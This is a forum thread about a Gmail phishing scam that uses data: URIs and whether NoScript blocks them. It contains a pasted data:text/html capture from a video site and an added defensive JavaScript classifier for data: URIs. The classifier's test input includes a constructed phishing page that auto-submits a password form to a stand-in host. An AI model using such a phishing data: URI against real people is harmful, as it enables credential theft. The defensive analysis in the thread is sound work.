https://www.wordfence.com/blog/2017/01/ ... -data-uri/
Does NoScript protect against this at all? If so how?
Subtle phishing scam targeting Gmail users
*Always* check the changelogs BEFORE updating that important software!
-
Re: Subtle phishing scam targeting Gmail users
noscript.allowURLBarJS
From what I recall (search earlier posts), there might be some issues with it?
(Its effectiveness, or not, possibly relating to a new window (as in it is bypassed on a new window, first entry, kind of thing), possibly only with SeaMonkey. Don't recall anymore.)
According to Wikipedia, Data URI scheme, the exploit avenue is years old, so why it is just being "discovered"...?
javascript: / data: URI being bypassed
I didn't fully read, but:
data:,Hello%2C%20World!
is not an image, bypasses the NoScript block.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 SeaMonkey/2.46 Lightning/.4.46
Re: Subtle phishing scam targeting Gmail users
My understanding is that the data: URI isn't typed or pasted in, it's loaded by clicking a link. NoScript treats that differently from a typed/pasted data: URI, but I don't remember what protection, if any, it does on data: URIs on whitelisted sites like Gmail.
And I seem to recall there were also issues with handling data: URIs loaded by clicking links, but that isn't turning up in searching.
Re: Subtle phishing scam targeting Gmail users
OK.
URL: http://openloadmovies.org/movies/the-three-stooges/
Center-click the video placeholder & you get something like:
(truncated)
Complete, https://pastebin.com/gTYxqDjp.
data:text/html,%3C!DOCTYPE%20html%3E%0A%3Chtml%20lang%3D%22en-US%22%3E%0A%3Chead%3E%3Cmeta%20charset%3D%22utf-8%22%20%2F%3E%3Cbase%20href%3D%22https%3A%2F%2Fopenload.co%2F%22%20%2F%3E%3Cscript%3Ewindow.exclude%3Dtrue%3Bwindow.turnoff%3Dtrue%3Bwindow.useCors%3Dtrue%3Bdocument.addEventListener(%22mouseup%22%2Cfunction()%7Blogpopup(1)%3B%7D%2Cfalse)%3Bwindow.corsToken%3D%22zxVHaaikYtBL5RgM1zXZNFv4Jq68x3dObkgqdFbq3eryWbyRKpvxVAiz60ypTWeW%22%3B%3C%2Fscript%3E%0A%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%2F%2F%3C!%5BCDATA%5B%0Atry%7Bif%20(!window.CloudFlare)%20%7Bvar%20CloudFlare%3D%5B%7Bverbose%3A0%2Cp%3A0%2Cbyc%3A0%2Cowlid%3A%22cf%22%2Cbag2%3A1%2Cmirage2%3A0%2Coracle%3A0%2Cpaths%3A%7Bcloudflare%3A%22%2Fcdn-cgi%2Fnexp%2Fdok3v%3D1613a3a185%2F%22%7D%2Catok%3A%220127ec569970300ae984d641e3d57198%22%2Cpetok%3A%227b7ee8e959d25e47574e5e409fe1c99b66ae14ee-1491060712-1800%22%2Czone%3A%22openload.co%22%2Crocket%3A%220%22%2Capps%3A%7B%22abetterbrowser%22%3A%7B%22ie%22%3A%228%22%2C%22opera%22%3A%2212.0%22%2C%22chrome%22%3A%222.9%22%2C%22safari%22%3A%223.0%22%2C%22firefox%22%3A%2220.0%22%7D%7D%7D%5D%3B!function(a%2Cb)%7Ba%3Ddocument.createElement(%22script%22)%2Cb%3Ddocument.getElementsByTagName(%22script%22)%5B0%5D%2Ca.async%3D!0%2Ca.src%3D%22%2F%2Fajax.cloudflare.com%2Fcdn-cgi%2Fnexp%2Fdok3v%3Df2befc48d1%2Fcloudflare.min.js%22%2Cb.parentNode.insertBefore(a%2Cb)%7D()%7D%7Dcatch(e)%7B%7D%3B%0A%2F%2F%5D%5D%3E%0A%3C%2Fscript%3E%0A%3Cscript%20type%3D%22text%2Fjavascript%22%3Ewindow.shouldreport%3D%225TMkyEx-4HE%22%3Bwindow.filesize%3D630507718%3B%3C%2Fscript%3E%20%3C!--%5Bif%20lte%20IE%208%5D%3E%3Cscript%20type%3D%22text%2Fjavascript%22%20src%3D%22%2Fassets%2Fjs%2Fexcanvas.js%22%3E%3C%2Fscript%3E%3C!%5Bendif%5D--%3E%0A%3Cmeta%20name%3D%22description%22%20content%3D%22The_Three_Stooges_2012_720p_BrRip_YIFY_HI.mp4%22%3E%0A%3Cmeta%20name%3D%22og%3Atitle%22%20content%3D%22The_Three_Stooges_2012_720p_BrRip_YIFY_HI.mp4%22%3E%0A%3Cmeta%20name%3D%22og%3Adescription%22%20content%3D%22Strea
m%20The_Three_Stooges_2012_720p_BrRip_YIFY_HI.mp4%20via%20Openload%22%3E%0A%3Cmeta%20name%3D%22og%3Atype%22%20content%3D%22video.movie%22%3E%0A%3Cmeta%20name%3D%22og%3Aurl%22%20content%3D%22https%3A%2F%2Fopenload.co%2Fembed%2F5TMkyEx-4HE%2FThe_Three_Stooges_2012_720p_BrRip_YIFY_HI.mp4%22%3E%0A%3Cmeta%20name%3D%22og%3Asitename%22%20content%3D%22Openload%22%3E%0A%3Cmeta%20name%3D%22og%3Aimage%22%20content%3D%22https%3A%2F%2Fthumb.oloadcdn.net%2Fsplash%2F5TMkyEx-4HE%2FH8_xqwq193E.jpg%22%3E%0A%3Cmeta%20name%3D%22twitter%3Acard%22%20content%3D%22summary_large_image%22%3E%0A%3Cmeta%20name%3D%22twitter%3Atitle%22%20content%3D%22The_Three_Stooges_2012_720p_BrRip_YIFY_HI.mp4%22%3E%0A%3Cmeta%20name%3D%22twitter%3Adescription%22%20content%3D%22Stream%20The_Three_Stooges_2012_720p_BrRip_YIFY_HI.mp4%20via%20Openload%22%3E%0A%3Cmeta%20name%3D%22twitter%3Aimage%22%20content%3D%22https%3A%2F%2Fthumb.oloadcdn.net%2Fsplash%2F5TMkyEx-4HE%2FH8_xqwq193E.jpg%22%3E%0A%3Cmeta%20name%3D%22robots%22%20content%3D%22noindex%22%3E%0A%3Clink%20href%3D%22https%3A%2F%2Fcdnjs.cloudflare.com%2Fajax%2Flibs%2Fvideo.js%2F5.15.1%2Fvideo-js.min.css%22%20rel%3D%22stylesheet%22%3E%0A%3Clink%20href%3D%22%2Fassets%2Fcss%2Fvideo.js%2Folvideo.css%22%20rel%3D%22stylesheet%22%3E%0A%3Cscript%20src%3D%22%2Fassets%2Fjs%2Fjquery.min.js%22%3E%3C%2Fscript%3E%0A%3Cscript%20src%3D%22%2Fassets%2Fjs%2Fvideojs-ie8.min.3.js%22%3E%3C%2Fscript%3E%3Cscript%3E%0D%0Awindow._VideoLoaded%3Dfalse%3B%0D%0A%3C%2Fscript%3E%0A%3C%2Fhead%3E%0A%3Cbody%3E%0A%3Cdiv%20id%3D%22mediaspace_wrapper%22%3E%0A%3Cdiv%20class%3D%22videocontainer%22%3E%0A%3Cinput%20type%3D%22file%22%20id%3D%22srtSelector%22%20style ...
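An added example, not code from this thread, from NoScript or from the Wordfence post: a small RFC 2397 data: URI parser plus a defender-side classifier that answers the question raised earlier in the thread, namely which data: URIs are inert text or images and which, like data:text/html, render a full document the browser will navigate to at top level (the vector in the Gmail phishing case). It also pulls out of the decoded HTML the indicators a phishing page depends on: the <title>, the <base href> that rewrites every relative URL (the openload URI quoted above carries one pointing at openload.co), form actions and script sources. The "Hello, World!" URI is the one quoted in the thread; the phishing-style sample and the function names are my own constructions, and example.invalid is a reserved, non-resolving domain.

```javascript
// Added example (not from the NoScript thread or from NoScript itself).
// parseDataUri follows RFC 2397; classifyDataUri and extractIndicators are
// my own defender-side helpers for triaging a data: link before opening it.

function parseDataUri(uri) {
  // Syntax: data:[<mediatype>][;<param>=<value>]*[;base64],<data>
  const m = /^data:([^,]*),([\s\S]*)$/i.exec(uri.trim());
  if (!m) return null;
  const parts = m[1].split(';').map(s => s.trim()).filter(Boolean);
  let base64 = false;
  if (parts.length && parts[parts.length - 1].toLowerCase() === 'base64') {
    base64 = true;
    parts.pop();
  }
  // RFC 2397: an omitted media type means text/plain;charset=US-ASCII,
  // which is why "data:,Hello%2C%20World!" is text, not an image.
  let mediaType = 'text/plain';
  if (parts.length && parts[0].includes('/')) mediaType = parts.shift().toLowerCase();
  const params = {};
  for (const p of parts) {
    const eq = p.indexOf('=');
    if (eq > 0) params[p.slice(0, eq).trim().toLowerCase()] = p.slice(eq + 1).trim();
  }
  if (mediaType === 'text/plain' && !params.charset) params.charset = 'US-ASCII';
  let data = null, malformed = false;
  try {
    data = base64 ? Buffer.from(m[2], 'base64').toString('utf8')
                  : decodeURIComponent(m[2]);
  } catch (e) {
    malformed = true;            // stray '%' or an invalid UTF-8 sequence
  }
  return { mediaType, params, base64, data, malformed };
}

// The things a phishing document needs: where its forms post, which scripts
// it loads, and the <base> that silently rewrites every relative URL.
function extractIndicators(html) {
  const grab = (re) => Array.from(html.matchAll(re), x => x[1]);
  const title = /<title[^>]*>([\s\S]*?)<\/title>/i.exec(html);
  return {
    title: title ? title[1].trim() : null,
    baseHref: grab(/<base\b[^>]*\bhref\s*=\s*["']([^"']+)["']/gi)[0] || null,
    formActions: grab(/<form\b[^>]*\baction\s*=\s*["']([^"']+)["']/gi),
    scriptSrcs: grab(/<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi),
    // a <script> tag whose body is not empty, i.e. inline code
    inlineScript: /<script\b[^>]*>(?!\s*<\/script>)/i.test(html),
  };
}

function classifyDataUri(uri) {
  const p = parseDataUri(uri);
  if (!p) return { verdict: 'not-a-data-uri' };
  if (p.malformed) return { verdict: 'malformed', mediaType: p.mediaType };
  // Media types a browser renders as a document (and runs script in) when
  // navigated to at top level; other types are inert when opened that way.
  const documentTypes = new Set(['text/html', 'application/xhtml+xml', 'image/svg+xml']);
  if (documentTypes.has(p.mediaType)) {
    return { verdict: 'renders-document', mediaType: p.mediaType, ...extractIndicators(p.data) };
  }
  if (p.mediaType.startsWith('image/')) return { verdict: 'image', mediaType: p.mediaType };
  return { verdict: 'inert', mediaType: p.mediaType, preview: p.data.slice(0, 40) };
}

// Sample inputs: the first is the URI quoted in the thread; the others are
// constructed (a phishing-style login page and a 1x1 transparent GIF).
const SAMPLE_PLAIN = 'data:,Hello%2C%20World!';
const SAMPLE_PHISH = 'data:text/html,' + encodeURIComponent(
  '<html><head><title>Sign in</title><base href="https://example.invalid/"></head>' +
  '<body><form action="collect.php" method="post"><input name="pass"></form>' +
  '<script src="/a.js"></script><script>document.forms[0].submit()</script></body></html>');
const SAMPLE_IMAGE = 'data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==';

for (const u of [SAMPLE_PLAIN, SAMPLE_PHISH, SAMPLE_IMAGE]) {
  console.log(JSON.stringify(classifyDataUri(u)));
}
```

The verdict a triage tool should act on is `renders-document`: a data:text/html link reached by clicking, as in the Gmail case, is a full page with its own forms and scripts, and the `baseHref` field tells you where any relative form action or script path will actually resolve.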
Re: Subtle phishing scam targeting Gmail users
For me it appears to give me the direct link to the video.
Re: Subtle phishing scam targeting Gmail users
Ah, I left out some steps, didn't I.
So...
URL: http://openloadmovies.org/movies/the-three-stooges/
By default, you should see a placeholder.
Center-click the placeholder.
Opens, https://openload.co/embed/5TMkyEx-4HE/T ... IFY_HI.mp4
Temporarily Allow, openload.co
Page refreshes & URL changes to a data: URI.
Re: Subtle phishing scam targeting Gmail users
Yep, I see it after following your steps, and then clicking the play button in the middle. It asks me whether I want to open or save the data URI.
Re: Subtle phishing scam targeting Gmail users
Re: Subtle phishing scam targeting Gmail users
Thanks for the link, therube.
Top-level data: URIs are critical for me. Disabling that would make it unusable. I hope that if they go that route, there will be a way to re-enable top-level data: URIs.